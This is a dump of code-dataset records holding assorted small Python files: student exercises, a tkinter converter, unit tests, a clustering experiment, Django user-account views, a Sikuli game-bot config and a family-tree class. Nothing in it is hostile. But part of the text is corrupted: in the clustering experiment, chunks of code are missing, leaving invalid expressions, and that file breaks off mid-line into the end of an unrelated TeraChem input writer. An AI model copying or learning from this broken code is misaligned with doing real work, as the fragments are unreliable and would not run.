# eval(input(\"Enter number of hours worked in a week: \"))\npayRate = 9.75 # eval(input(\"Enter hourly pay rate: \"))\ntaxFederal = 0.20 # eval(input(\"Enter federal tax withholding rate: \"))\ntaxState = 0.09 # eval(input(\"Enter state tax withholding rate: \"))\n\npayGross = hours * payRate\npayNet = payGross * (1 - (taxFederal + taxState))\n\nout = \"Employee Name: \" + name + \"\\n\"\nout += \"Hours worked: \" + format(hours, \".1f\") + \"\\n\"\nout += \"Pay Rate: \" + format(payRate, \".2f\") + \"\\n\"\nout += \"Gross Pay: \" + format(payGross, \".1f\") + \"\\n\"\nout += \"Deductions: \" + \"\\n\"\nout += \" Federal Withholding (\" + format(taxFederal, \".1%\") + \"): $\" + format(payGross * taxFederal, \".2f\") + \"\\n\"\nout += \" State Withholding (\" + format(taxState, \".1%\") + \"): $\" + format(payGross * taxState, \".2f\") + \"\\n\"\nout += \" Total Deduction: $\" + format(payGross * (taxState + taxFederal), \".2f\") + \"\\n\"\nout += \"Net Pay: $\" + format(payNet, \".2f\")\n\nprint(out)\n","sub_path":"KAU_CPIT110/Lab5/Problem 2.py","file_name":"Problem 2.py","file_ext":"py","file_size_in_byte":997,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"262200235","text":"from tkinter import *\n\n\ndef convert_to_measurements():\n clear_text()\n\n try:\n grams = float(kg_value.get()) * 1000\n pounds = float(kg_value.get()) * 2.20462\n ounces = float(kg_value.get()) * 35.274\n\n gram_text.insert(END, grams)\n pounds_text.insert(END, pounds)\n ounces_text.insert(END, ounces)\n except ValueError:\n gram_text.insert(END, \"NaN\")\n pounds_text.insert(END, \"NaN\")\n ounces_text.insert(END, \"NaN\")\n\n\ndef clear_text():\n gram_text.delete(1.0, END)\n pounds_text.delete(1.0, END)\n ounces_text.delete(1.0, END)\n\n\nwindow = Tk()\n\nkg_label = Label(window, text=\"Kg\")\nkg_label.grid(row=0, column=0)\n\nkg_value = StringVar()\nkg_input = Entry(window, textvariable=kg_value)\nkg_input.grid(row=0, column=1)\n\nconvert_button = Button(window, text=\"Convert\", command=convert_to_measurements)\nconvert_button.grid(row=0, column=2)\n\ngram_text = Text(window, height=1, width=20)\ngram_text.grid(row=1, column=0)\n\npounds_text = Text(window, height=1, width=20)\npounds_text.grid(row=1, column=1)\n\nounces_text = Text(window, height=1, width=20)\nounces_text.grid(row=1, column=2)\n\nwindow.mainloop()\n","sub_path":"PMC/Section14/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1164,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"633560110","text":"from unittest import TestCase\nfrom mockito import *\n\nfrom src.Fastq import *\nfrom src.SeqAdn import *\n\n__author__ = 'eps'\n\n\nclass TestFastq(TestCase):\n \"\"\"\n Esta clase de test representa los test para la clase Fastq\n \"\"\"\n def test_get_average_qual(self):\n \"\"\"\n Esta clase representa un claculo medio de todas las secuencias...\n\n\n \"\"\"\n seq_1 = mock(SeqAdn)\n seq_2 = mock(SeqAdn)\n\n when(seq_1).av_qual().thenReturn(10)\n when(seq_2).av_qual().thenReturn(15)\n\n fastq = Fastq('roche')\n fastq.add_sequences(seq_1)\n fastq.add_sequences(seq_2)\n\n self.assertEquals(fastq.get_average_qual(),12.5)\n","sub_path":"test/test_fastq.py","file_name":"test_fastq.py","file_ext":"py","file_size_in_byte":676,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"122279317","text":"import numpy as np\nimport time\nimport yaml\nimport sys\nimport logging\nimport pandas as pd\nsys.path.append('../../../../Code/')\nfrom plot_grid import load_h5, data\nfrom kmeans_hops import getConstraints, normalize, doMutualInformation, getCollisions\nfrom rfml.core import Experiment\nfrom sklearn.cluster import k_means, KMeans, SpectralClustering, AgglomerativeClustering, DBSCAN\nfrom sklearn.metrics import silhouette_score\nfrom statistics import mode\nfrom collections import Counter\n\n\ndbg = True\nlogging.basicConfig(level=logging.DEBUG)\nlogger = logging.getLogger()\nlogger.handlers = []\nch = logging.StreamHandler()\nfmt = logging.Formatter(\"%(thread)d %(levelname)s --\"\n \"%(filename)s (line %(lineno)s):%(funcName)s: \"\n \"%(message)s\")\nch.setFormatter(fmt)\nch.setLevel(logging.DEBUG if dbg else logging.INFO)\nlogger.addHandler(ch)\n\nn_runs = 1 \nmax_iter = 50\n\n\ndef reassignClusterLabels(keylabels,guesslabels):\n guesslabels=np.asarray(guesslabels)\n originalGuessLabels=np.copy(guesslabels)\n numberOfClusters=max(keylabels)+1\n if numberOfClusters != len(set(keylabels)):\n return False\n for clusterNumber in range(numberOfClusters):\n locations = np.where(np.asarray(keylabels)==clusterNumber)\n guessMajority = max(set(list(originalGuessLabels[locations])), key=list(originalGuessLabels[locations]).count) \n guesslabels[np.where(np.asarray(originalGuessLabels)==guessMajority)[0]]=clusterNumber\n return list(guesslabels)\n\ndef getClusterAccuracy(keylabels,guesslabels):\n if not guesslabels:\n return None\n correct = (np.asarray(keylabels)==np.asarray(guesslabels))\n accuracy = correct.sum()/correct.size\n return accuracy\n\ndef getCollisionAccuracy(keylabels,guesslabels,collisions):\n if not guesslabels:\n return None\n if not collisions:\n return None\n guesslabels = reassignClusterLabels(keylabels,guesslabels)\n logger.debug(\"collisions {}\".format(collisions))\n flatList=[item for sublist in collisions for item in sublist]\n logger.debug(\"flatlist {}\".format(flatList))\n uniqueElements=set(flatList)\n tally=[]\n collisionAccuracy=0\n for elem in uniqueElements:\n if (keylabels[elem] == guesslabels[elem]):\n tally+=[1]\n else:\n tally+=[0]\n collisionAccuracy=sum(tally)/len(tally)\n return collisionAccuracy\n\ndef getSilhouetteCoeff(data,labels):\n silCoeff=silhouette_score(data,labels,metric='euclidean')\n return silCoeff\n\n\ndef getMinClusters(hops,params):\n endind = params.index(\"endtime\")\n startind = params.index(\"starttime\")\n numHops = hops.shape[0]\n overlaps=[]\n for hopidx,hop in enumerate(hops):\n start=hop[startind]\n end=hop[endind]\n #print(np.equal(np.delete(hops,hopidx,0)[:,startind]start))\n\n overlaps.append(np.sum(np.equal(np.delete(hops,hopidx,0)[:,startind]start)))\n return np.max(overlaps)+1\n\nclass MonteCarlo(Experiment):\n\n def __init__(self, config, dbg):\n super(MonteCarlo, self).__init__('MonteCarlo', config, dbg)\n with open('param_config.yml','r') as stream:\n self.param_dict = (yaml.load(stream))\n\n\n def run(self, trials, errors,runnum):\n numWritesToFile=0\n ktorun=[3,4,5,6,7,8]\n for kclusters in ktorun:\n for t in trials:\n for e in errors:\n logger.info(\"================= On Trial {} and Error {} ==============\".format(t,e))\n max_endtime = self.param_dict['grid']['duration'][2]\n hops, key, oparams = load_h5('../../../../Code/TimeHops/ZeroError' + str(kclusters)+'Hops.h5',['pulseshape'], t, e) \n logger.debug(\"key {}\".format(key))\n\n #PercentConstraintsDropped=[0,.25,.50,.75,.99]\n PercentConstraintsDropped=[0]\n for ConstraintsDropped in PercentConstraintsDropped:\n heldoutTrainPoints=[.5]\n for heldout in heldoutTrainPoints:\n train_hops = np.copy(hops)\n train_keys = np.copy(key)\n params = np.copy(oparams)\n print(max_endtime*.5)\n\n #hop indices that will be held out for testing\n test_hop_idx = np.where(np.asfarray(hops[:,np.where(params == 'starttime')[0]]) >(max_endtime*(heldout)))[0]\n test_hop_last50_idx = np.where(np.asfarray(hops[:,np.where(params == 'starttime')[0]]) >(max_endtime*(.5)))[0]\n logger.debug('held out test hops {}'.format(test_hop_idx))\n\n test_hops = hops[test_hop_last50_idx]\n test_keys = [key[indx] for indx in test_hop_last50_idx]\n\n test_hops = test_hops.astype(np.float)\n train_hops = train_hops.astype(np.float)\n\n train_hops=np.delete(train_hops,test_hop_idx,axis=0)\n train_keys=np.delete(train_keys,test_hop_idx)\n\n if (len(set(train_keys)) \"+ inpNameBase[:-3] + \"log \\n\")\n \n slurmFile.close()\n \n# lastXyz = self.xyz[-1]\n xyzFile = open(xyzName, 'w')\n xyzFile.write(str(len(self.elements))+\"\\n\\n\")\n \n for el, coord in zip(self.elements, self.xyz[-1]):\n xyzFile.write(el+\" \"+\" \".join([ str(c) for c in coord ])+\"\\n\")\n xyzFile.close()\n","sub_path":"terachemParser.py","file_name":"terachemParser.py","file_ext":"py","file_size_in_byte":5706,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"5725220","text":"import numpy as np\nfrom sklearn.neighbors import KNeighborsClassifier\nfrom sklearn.datasets import load_iris\nfrom sklearn.externals import joblib\n\niris = load_iris()\n\nX = iris.data\ny = iris.target\n\nidxs = np.random.permutation(len(X))\n\nX_train = X[idxs[:-10]]\ny_train = y[idxs[:-10]]\n\nX_test = X[idxs[-10:]]\ny_test = y[idxs[-10:]]\n\nclf = KNeighborsClassifier()\nclf.fit(X_train, y_train)\n\njoblib.dump(clf, 'model.pkl')","sub_path":"train_model.py","file_name":"train_model.py","file_ext":"py","file_size_in_byte":417,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"527645413","text":"import json\nfrom rank_bm25 import BM25Okapi\nfrom nltk.stem import PorterStemmer\n\ndef getRelevantCourses(school, interests):\n courses = getCourses(school)\n textArr = []\n for course in courses:\n text = course['title'] + '. ' + course['desc']\n textArr.append(process(text))\n bm25 = BM25Okapi(textArr)\n interests = interests.replace('-',' ')\n query = process(interests)\n scores = bm25.get_scores(query).tolist()\n #return bm25.get_top_n(query, textArr, n=1)\n idx = scores.index(max(scores))\n relevantCourses = []\n for i in range(len(scores)):\n courses[i]['relevancy'] = scores[i]\n if(scores[i] > 0):\n relevantCourses.append(courses[i])\n relevantCourses = insertionInverseSort(relevantCourses)\n return relevantCourses\n\ndef getCourses(school):\n with open('course_catalogs/courses_' + school + '.json', 'r') as jsonFile:\n data = json.load(jsonFile)\n return data['courses']\n\n#getRelevantCourses('ucla', 'gang')\n\ndef process(text):\n text = text.lower()\n text = text.replace('.', '').replace(' ',' ')\n words = text.split(' ')\n porter = PorterStemmer()\n stems = []\n for word in words:\n stems.append(porter.stem(word))\n return stems\n\ndef insertionInverseSort(courses):\n for i in range(1, len(courses)):\n key = courses[i]\n j = i - 1\n while j >= 0 and key['relevancy'] > courses[j]['relevancy']:\n courses[j+1] = courses[j]\n j -= 1\n courses[j+1] = key\n return courses\n\n#out = getRelevantCourses('ucdavis', 'chemical-engineering')\n\n","sub_path":"methods.py","file_name":"methods.py","file_ext":"py","file_size_in_byte":1591,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"367017555","text":"from datetime import datetime\n\nfrom django.db.models import Q\nfrom django.http import HttpResponse, JsonResponse\nfrom django.shortcuts import render, redirect, render_to_response\nfrom django.views.decorators.csrf import csrf_exempt\nfrom django.views.generic import View\nfrom django.contrib.auth import authenticate, logout, login\nfrom django.core.paginator import Paginator\n\nfrom courses.models import CourseInfo\nfrom operations.models import UserLove, UserMessage\nfrom orgs.models import OrgInfo, TeacherInfo\nfrom utils.send_mail_tool import send_email_code\n# Create your views here.\n\nfrom users.forms import UserRegisterForm, UserLoginForm, UserForgetForm, UserResetForm, \\\n UserChangeImageForm, UserChangeInfoForm, UserChangeEmailForm, UserResetEmailForm, UserPwdForm\nfrom users.models import UserProfile, EmailVerifyCode, BannerInfo\n\nclass IndexView(View):\n def get(self, request):\n all_banners = BannerInfo.objects.all().order_by('-add_time')[:5]\n course_banners = CourseInfo.objects.filter(is_banner=True)[:3]\n all_course = CourseInfo.objects.filter(is_banner=False)[:6]\n all_orgs = OrgInfo.objects.all().order_by('-love_num')[:15]\n return render(request, 'index.html', locals())\n\n\n# def index(request):\n# all_banners = BannerInfo.objects.all().order_by('-add_time')[:5]\n# course_banners = CourseInfo.objects.filter(is_banner=True)[:3]\n# all_course = CourseInfo.objects.filter(is_banner=False)[:6]\n# all_orgs = OrgInfo.objects.all().order_by('-love_num')[:15]\n# return render(request, 'index.html', locals())\n\nclass RegisterView(View):\n def get(self, request):\n user_register_form = UserRegisterForm()\n return render(request, 'users/register.html', locals())\n\n def post(self, request):\n user_register_form = UserRegisterForm(request.POST)\n if user_register_form.is_valid():\n email = user_register_form.cleaned_data['email']\n password = user_register_form.cleaned_data['password']\n\n user_list = UserProfile.objects.filter(Q(username=email) | Q(email=email))\n if user_list:\n return render(request, 'users/register.html', {\n 'msg': '用户已经存在'\n })\n else:\n a = UserProfile()\n a.username = email\n a.set_password(password)\n a.email = email\n\n # 进行邮箱验证激活\n # 发送邮箱验证码\n if send_email_code(email, 1):\n a.save()\n return HttpResponse('情尽快前往邮箱激活账号')\n else:\n return HttpResponse('注册失败')\n # return redirect('/users/user_login')\n else:\n return render(request, 'users/register.html', {\n 'user_register_form': user_register_form\n })\n\n\nclass LoginView(View):\n def get(self, request):\n return render(request, 'users/login.html')\n\n def post(self, request):\n user_login_form = UserLoginForm(request.POST)\n if user_login_form.is_valid():\n email = user_login_form.cleaned_data['email']\n password = user_login_form.cleaned_data['password']\n\n user = authenticate(username=email, password=password)\n if user:\n if user.is_start:\n login(request, user)\n a = UserMessage()\n a.message_man = user.id\n a.message_content = '欢迎登录'\n a.save()\n url = request.COOKIES.get('url', '/')\n ret = redirect(url)\n ret.delete_cookie('url')\n return ret\n else:\n return HttpResponse('请去邮箱激活账号')\n else:\n return render(request, 'users/login.html', {\n 'msg': '邮箱或密码有误'\n })\n else:\n return render(request, 'users/login.html', {\n 'user_login_form': user_login_form\n })\n\n\ndef user_logout(request):\n logout(request)\n return redirect('/')\n\n\ndef user_active(request, code):\n if code:\n print(code)\n email_ver_list = EmailVerifyCode.objects.filter(code=code)\n if email_ver_list:\n print(email_ver_list)\n email_ver = email_ver_list[0]\n email = email_ver.email\n print(email)\n user_list = UserProfile.objects.filter(username=email)\n print(user_list)\n if user_list:\n user = user_list[0]\n user.is_start = True\n user.save()\n return redirect('/')\n else:\n return HttpResponse('code1')\n else:\n return HttpResponse('code2')\n else:\n return HttpResponse('code3')\n\n\nclass ForgetView(View):\n def get(self, request):\n user_forget_form = UserForgetForm()\n\n return render(request, 'users/forgetpwd.html', {\n 'user_forget_form': user_forget_form\n })\n\n def post(self, request):\n user_forget_form = UserForgetForm(request.POST)\n if user_forget_form.is_valid():\n email = user_forget_form.cleaned_data['email']\n user_list = UserProfile.objects.filter(email=email)\n if user_list:\n if send_email_code(email, 2):\n return HttpResponse('情尽快去邮箱重置密码')\n else:\n msg = '验证失败'\n return render(request, 'users/forgetpwd.html', locals())\n else:\n msg = '用户不存在'\n return render(request, 'users/forgetpwd.html', locals())\n else:\n return render(request, 'users/forgetpwd.html', locals())\n\n\ndef user_reset(request, code):\n if code:\n if request.method == 'GET':\n return render(request, 'users/password_reset.html', {\n 'code': code\n })\n else:\n user_reset_form = UserResetForm(request.POST)\n if user_reset_form.is_valid():\n password1 = user_reset_form.cleaned_data['password1']\n password2 = user_reset_form.cleaned_data['password2']\n if password1 == password2:\n email_ver_list = EmailVerifyCode.objects.filter(code=code)\n if email_ver_list:\n email_ver = email_ver_list[0]\n email = email_ver.email\n user_list = UserProfile.objects.filter(email=email)\n if user_list:\n user = user_list[0]\n user.set_password(password1)\n user.save()\n return redirect('/users/user_login/')\n else:\n pass\n else:\n pass\n else:\n return render(request, 'users/password_reset.html', {\n 'msg': '密码不一致',\n 'code': code\n })\n else:\n return render(request, 'users/password_reset.html', {\n 'user_reset_form': user_reset_form\n })\n\n\ndef user_info(request):\n return render(request, 'users/usercenter-info.html')\n\n\ndef user_changeimage(request):\n # instance 指明实例是什么,作修改的时候需要知道是给哪个对象实例进行修改,如果不指明,将会被当做创建对象去保存\n user_changeimage_form = UserChangeImageForm(request.POST, request.FILES, instance=request.user)\n if user_changeimage_form.is_valid():\n user_changeimage_form.save(commit=True)\n return JsonResponse({'status': 'ok'})\n else:\n return JsonResponse({'status': 'fail'})\n\n\ndef user_changeinfo(request):\n user_changeinfo_form = UserChangeInfoForm(request.POST, instance=request.user)\n if user_changeinfo_form.is_valid():\n user_changeinfo_form.save(commit=True)\n return JsonResponse({'status': 'ok', 'msg': '修改成功'})\n else:\n return JsonResponse({'status': 'fail', 'msg': '修改失败'})\n\n\ndef user_changeemail(request):\n user_changeeamil_form = UserChangeEmailForm(request.POST)\n if user_changeeamil_form.is_valid():\n email = user_changeeamil_form.cleaned_data['email']\n user_list = UserProfile.objects.filter(Q(email=email) | Q(username=email))\n if user_list:\n return JsonResponse({'status': 'fail', 'msg': '邮箱已经被绑定'})\n else:\n email_ver_list = EmailVerifyCode.objects.filter(email=email, send_type=3)\n if email_ver_list:\n email_ver = email_ver_list.order_by('-add_time')[0]\n # 判断当前时间和最近添加验证码的时间之差\n if (datetime.now() - email_ver.add_time).seconds > 60:\n email_ver.delete()\n send_email_code(email, 3)\n return JsonResponse({'status': 'ok', 'msg': '验证码已发送至邮箱'})\n else:\n return JsonResponse({'status': 'fail', 'msg': '请去邮箱查看验证码或请一分钟后重新发送'})\n else:\n send_email_code(email, 3)\n return JsonResponse({'status': 'ok', 'msg': '验证码已发送至邮箱'})\n else:\n return JsonResponse({'status': 'fail', 'msg': '您的邮箱存在异常'})\n\n\ndef user_resetemail(request):\n user_resetemail_form = UserResetEmailForm(request.POST)\n if user_resetemail_form.is_valid():\n email = user_resetemail_form.cleaned_data['email']\n code = user_resetemail_form.cleaned_data['code']\n print('==========', code, email)\n code_ver_list = EmailVerifyCode.objects.filter(email=email, code=code)\n print('-----------', code_ver_list)\n if code_ver_list:\n code_ver = code_ver_list[0]\n if (datetime.now() - code_ver.add_time).seconds < 60:\n request.user.username = email\n request.user.email = email\n request.user.save()\n return JsonResponse({'status': 'ok', 'msg': '修改成功'})\n else:\n return JsonResponse({'status': 'fail', 'msg': '验证码已经失效,请重新获取验证码'})\n else:\n return JsonResponse({'status': 'fail', 'msg': '邮箱或者验证码错误'})\n else:\n return JsonResponse({'status': 'fail', 'msg': '邮箱或者验证码异常'})\n\n\ndef user_course(request):\n all_courses = request.user.usercourse_set.all()\n course_list = [usercourse.study_course for usercourse in all_courses]\n return render(request, 'users/usercenter-mycourse.html', locals())\n\n\ndef user_fav_org(request):\n # all_fav_org = request.user.userlove_set.all().filter(love_type=1)\n all_fav_org = UserLove.objects.filter(love_man=request.user, love_type=1, love_status=True)\n org_id_list = [user_fav.love_id for user_fav in all_fav_org]\n org_list = OrgInfo.objects.filter(id__in=org_id_list)\n return render(request, 'users/usercenter-fav-org.html', {\n 'org_list': org_list\n })\n\n\ndef user_fav_teacher(request):\n all_fav_teacher = UserLove.objects.filter(love_man=request.user, love_type=3, love_status=True)\n teacher_id_list = [user_fav.love_id for user_fav in all_fav_teacher]\n teacher_list = TeacherInfo.objects.filter(id__in=teacher_id_list)\n return render(request, 'users/usercenter-fav-teacher.html', {\n 'teacher_list': teacher_list\n })\n\n\ndef user_fav_course(request):\n all_fav_course = UserLove.objects.filter(love_man=request.user, love_type=2, love_status=True)\n course_id_list = [user_fav.love_id for user_fav in all_fav_course]\n course_list = CourseInfo.objects.filter(id__in=course_id_list)\n return render(request, 'users/usercenter-fav-course.html', {\n 'course_list': course_list\n })\n\n\ndef user_message(request):\n msg_list = UserMessage.objects.filter(message_man=request.user.id).order_by('-add_time')\n page = request.GET.get('page', 1)\n pages = Paginator(msg_list, 5)\n try:\n pager = pages.page(page)\n except:\n pager = pages.page(1)\n return render(request, 'users/usercenter-message.html', locals())\n\n\ndef user_message_read(request):\n read_id = request.GET.get('read_id', '')\n msg = UserMessage.objects.filter(id=int(read_id))\n if msg:\n msg[0].message_status = True\n msg[0].save()\n return JsonResponse({'status': 'ok', 'msg': 'success'})\n else:\n return JsonResponse({'status': 'fail', 'msg': 'fail'})\n\n\ndef user_change_pwd(request):\n user_change_pwd_form = UserPwdForm(request.POST)\n if user_change_pwd_form.is_valid():\n pwd = user_change_pwd_form.cleaned_data['pwd']\n repwd = user_change_pwd_form.cleaned_data['repwd']\n if pwd == repwd:\n user = request.user\n user.set_password(pwd)\n user.save()\n return JsonResponse({'status': 'ok'})\n else:\n return JsonResponse({'status': 'fail', 'msg': '密码不一致'})\n else:\n return JsonResponse({'status': 'fail', 'msg': '密码不合法'})\n\n\ndef page_error(request):\n return render(request, '500.html')","sub_path":"apps/users/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":13485,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"584778609","text":"from turtle import Turtle, setworldcoordinates\nimport random\nclass Food(Turtle):\n\n def __init__(self):\n super().__init__() \n self.shape(\"circle\")\n self.penup()\n self.color(\"red\")\n self.speed(\"fastest\")\n self.shapesize(0.5,0.5)\n\n self.newLoc()\n \n def newLoc(self):\n rax=random.randint(-280,290)\n ray=random.randint(-290,290)\n self.goto(rax,ray)\n ","sub_path":"food.py","file_name":"food.py","file_ext":"py","file_size_in_byte":431,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"598870760","text":"# coding=utf-8\nfrom sikuli import *\n\nclass StageInformation:\n def __init__(self, image, waves):\n self.image = image\n self.waves = waves\n\nBotMachineImage = Pattern(\"BotMachineImage.png\").targetOffset(-34,19) # 請抓足以代表該視窗的標誌, 並且把目標位置偏移設到視窗內最左上角\n\n#####################################################\n# 助手開啟區 (把想要的設成True, 不想要的設成False\nChallengeDrawBot = False\nExchangeStaminaFruitBot = False\nMainStoryMode = False\n\n#####################################################\n# 刷關設定區(把想要的前面的井號拿掉, 其它前面都要有井號), 括號內第一個參數是要刷的關的圖, 第二個參數是這關有幾波 (目前無用, 可亂輸入)\nStages = {}\nStages[\"PreQuest1\" ] = StageInformation(\"1469840818738.png\", 3)\nStages[\"PreQuest2\" ] = StageInformation(\"1470737543685.png\", 3)\nStages[\"Apprentice1\" ] = StageInformation(\"1470737554297.png\", 3)\n#####################################################\n# 其他設定區\nTargetTime = -1 # 要打幾次, -1就是無限次\n\nCardsToSell = [\"1466877917129.png\", \"1469563069398.png\"] # 要賣的卡就丟進這裡, 記得Filter好鎖好\n# 要賣的卡抓的圖請抓在中間, 可以用左邊的綠標籤來做位置對應, 只能抓在\"選択し\"這三個字中間的區域\n# 或者是直接從下面的備用區拉上來\n\nUseStone = True # True或False, 是否要吃石回體力, 開之前請先想清楚\nApprenticeMode = True # True或False, 是否是練徒弟, 是的話到等級50會自動停掉\nDebugLog = False # True或False, 當有無法解決的問題的時候就打開這個\nWipeRevive = True # True或False, 是否自動復活 \nMasterID = \"\" # 師父的ID, 記得要填否則不會自動加師父好友\n######################################################\n\nCardsToSellBackup = [\"1469278773591.png\", \"1466877907788.png\"] # 備用","sub_path":"LongPianoConfig.sikuli/LongPianoConfig.py","file_name":"LongPianoConfig.py","file_ext":"py","file_size_in_byte":1961,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"436030439","text":"class Solution(object):\n def islandPerimeter(self, grid):\n \"\"\"\n :type grid: List[List[int]]\n :rtype: int\n \"\"\"\n\n def valid(row, col):\n if row < 0 or col < 0:\n return False\n if row >= len(grid) or col >= len(grid[0]):\n return False\n return True\n\n def countEdge(row, col):\n if grid[row][col] == 0:\n return 0\n count = 4\n if valid(row, col - 1) and grid[row][col - 1] == 1:\n count -= 1\n if valid(row - 1, col) and grid[row - 1][col] == 1:\n count -= 1\n if valid(row, col + 1) and grid[row][col + 1] == 1:\n count -= 1\n if valid(row + 1, col) and grid[row + 1][col] == 1:\n count -= 1\n return count\n\n overlap_dict = {}\n h, w = len(grid), len(grid[0])\n total = 0\n for i in range(h):\n for j in range(w):\n total += countEdge(i, j)\n return total\n\n\nres = Solution().islandPerimeter([[0,1,0,0],[1,1,1,0],[0,1,0,0],[1,1,0,0]])\nprint(res) #16\n","sub_path":"leet/题目/e463.py","file_name":"e463.py","file_ext":"py","file_size_in_byte":1147,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"296146086","text":"# import tkinter\n# import time\nclass FamilyTree:\n # canvas = None\n class Node:\n def __init__(self, data, left=None, right=None):\n self.data = data\n self.left = left\n self.right = right\n def __repr__(self):\n return str(self.data)\n def __contains__(self, item):\n return item == self.data\n\n def __init__(self, meno_suboru):\n # start = time.clock()\n t = open(meno_suboru)\n self.vztahy = dict()\n riadok = t.readline()\n self.synovia = set()\n self.otcovia = set()\n while riadok != '':\n kandidat = str(riadok.split())[2:-2].split('-')\n try:\n self.vztahy[kandidat[0]].add(kandidat[1])\n except:\n self.vztahy[kandidat[0]] = set()\n self.vztahy[kandidat[0]].add(kandidat[1])\n self.synovia.add(kandidat[1])\n self.otcovia.add(kandidat[0])\n riadok = t.readline()\n for key in self.vztahy.keys():\n if key not in self.synovia:\n self.root = self.Node(key)\n t.close()\n to_do = set()\n to_do.add(self.root)\n remove = set()\n while (self.vztahy):\n to_do = to_do - remove\n for node in to_do:\n parent = node\n try:\n kandidat = list(self.vztahy[parent.data])\n except:\n remove.add(parent)\n continue\n if len(kandidat) == 2:\n parent.left = self.Node(kandidat[0])\n parent.right = self.Node(kandidat[1])\n to_do.remove(parent); to_do.add(parent.left); to_do.add(parent.right)\n self.vztahy.pop(parent.data)\n break\n elif len(kandidat) == 1:\n parent.left = self.Node(kandidat[0])\n to_do.add(parent.left); to_do.remove(parent)\n self.vztahy.pop(parent.data)\n break\n else:\n break\n # end = time.clock()\n # print(end)\n\n def find(self, data):\n strom = self.root\n if strom is not None:\n q = [strom]\n posledny = q[0]\n while q:\n vrchol = q.pop(0)\n if vrchol.data == data:\n return vrchol\n if vrchol.left is not None:\n q.append(vrchol.left)\n if vrchol.right is not None:\n q.append(vrchol.right)\n\n def __len__(self):\n return len(self.synovia)+1\n\n def depth(self, data):\n strom = self.root\n if data == strom.data:\n return 0\n if strom is not None:\n q = [strom]\n posledny = q[0]\n level = 0\n while q:\n vrchol = q.pop(0)\n if vrchol.left is not None:\n q.append(vrchol.left)\n if vrchol.right is not None:\n q.append(vrchol.right)\n if posledny not in q and q != []:\n posledny = q[-1]\n level += 1\n for v in q:\n if v.data == data:\n return level\n return None\n\n def height(self):\n level = 0\n strom = self.root\n if strom is not None:\n q = [strom]\n posledny = q[0]\n while q:\n vrchol = q.pop(0)\n if vrchol.left is not None:\n q.append(vrchol.left)\n if vrchol.right is not None:\n q.append(vrchol.right)\n if posledny not in q and q != []:\n posledny = q[-1]\n level+= 1\n return level\n\n def width(self):\n maxWidth = 0\n strom = self.root\n if strom is not None:\n q = [strom]\n posledny = q[0]\n while q:\n vrchol = q.pop(0)\n if vrchol.left is not None:\n q.append(vrchol.left)\n if vrchol.right is not None:\n q.append(vrchol.right)\n if posledny not in q and q != []:\n posledny = q[-1]\n if len(q) > maxWidth:\n maxWidth = len(q)\n return maxWidth\n\n def subtree_num(self, data):\n if data == self.root.data:\n return self.__len__()\n def pocet(data):\n if data is not None:\n q = [data]\n pocet = 1\n posledny = q[0]\n while q:\n vrchol = q.pop(0)\n if vrchol.left is not None:\n q.append(vrchol.left)\n if vrchol.right is not None:\n q.append(vrchol.right)\n if posledny not in q and q != []:\n pocet += len(q)\n posledny = q[-1]\n else:\n return 0\n return pocet\n return pocet(self.find(data))\n\n def descendant(self, data1, data2):\n if data1 == data2:\n return False\n def hladaj(strom):\n if strom is None:\n return False\n if strom is not None:\n q = [strom]\n posledny = q[0]\n while q:\n vrchol = q.pop(0)\n if vrchol.data == data2:\n return True\n if vrchol.left is not None:\n q.append(vrchol.left)\n if vrchol.right is not None:\n q.append(vrchol.right)\n if posledny not in q and q != []:\n posledny = q[-1]\n return False\n podstrom = self.find(data1)\n return hladaj(podstrom)\n\n def level_set(self, k):\n strom = self.root\n tempset, return_set = set(), set()\n if k == 0:\n return_set.add(self.root.data)\n strom = None\n if strom is not None:\n q = [strom]\n infosky = [strom.data]\n level = 0\n posledny = q[0]\n while q:\n vrchol = q.pop(0)\n infosky.pop(0)\n if vrchol.left is not None:\n q.append(vrchol.left)\n infosky.append(vrchol.left.data)\n if vrchol.right is not None:\n q.append(vrchol.right)\n infosky.append(vrchol.right.data)\n if posledny not in q and q != []:\n posledny = q[-1]\n level += 1\n if level == k:\n return_set = set(infosky)\n return return_set\n\n def leaves_num(self):\n sons = set(self.synovia)\n parents = set(self.otcovia)\n return len(sons - parents)\n\n\nif __name__ == '__main__':\n f = FamilyTree('subor1.txt')\n print('pocet vrcholov =', len(f))\n print('podstrom pre Bohumir =', f.subtree_num('Bohumir'))\n print('podstrom pre Robert =', f.subtree_num('Robert'))\n print('vyska =', f.height())\n print('sirka =', f.width())\n print('hlbka vrcholu Svatopluk =', f.depth('Svatopluk'))\n print('Miroslav ma potomka Bohuslav =', f.descendant('Miroslav','Bohuslav'))\n print('Svatopluk ma potomka Svatopluk =', f.descendant('Svatopluk','Svatopluk'))\n print('vrcholy na urovni 0 =', f.level_set(0))\n # print('vrcholy na urovni 1 =', f.level_set(1))\n # print('vrcholy na urovni 2 =', f.level_set(2))\n # print('vrcholy na urovni 3 =', f.level_set(3))\n # print('vrcholy na urovni 4 =', f.level_set(4))\n # print('vrcholy na urovni 5 =', f.level_set(5))\n # print('vrcholy na urovni 6 =', f.level_set(6))\n print('vrcholy na urovni 10 =', f.level_set(10))\n print('pocet listov =', f.leaves_num())\n # f.draw()\n","sub_path":"2014-2015/proj5.py","file_name":"proj5.py","file_ext":"py","file_size_in_byte":8028,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"4399960","text":"import sqlite3 as lite\n\nclass Database:\n TABLE_NAME, PRIMARY_KEY = \"Dictionary\", \"Word\"\n\n def 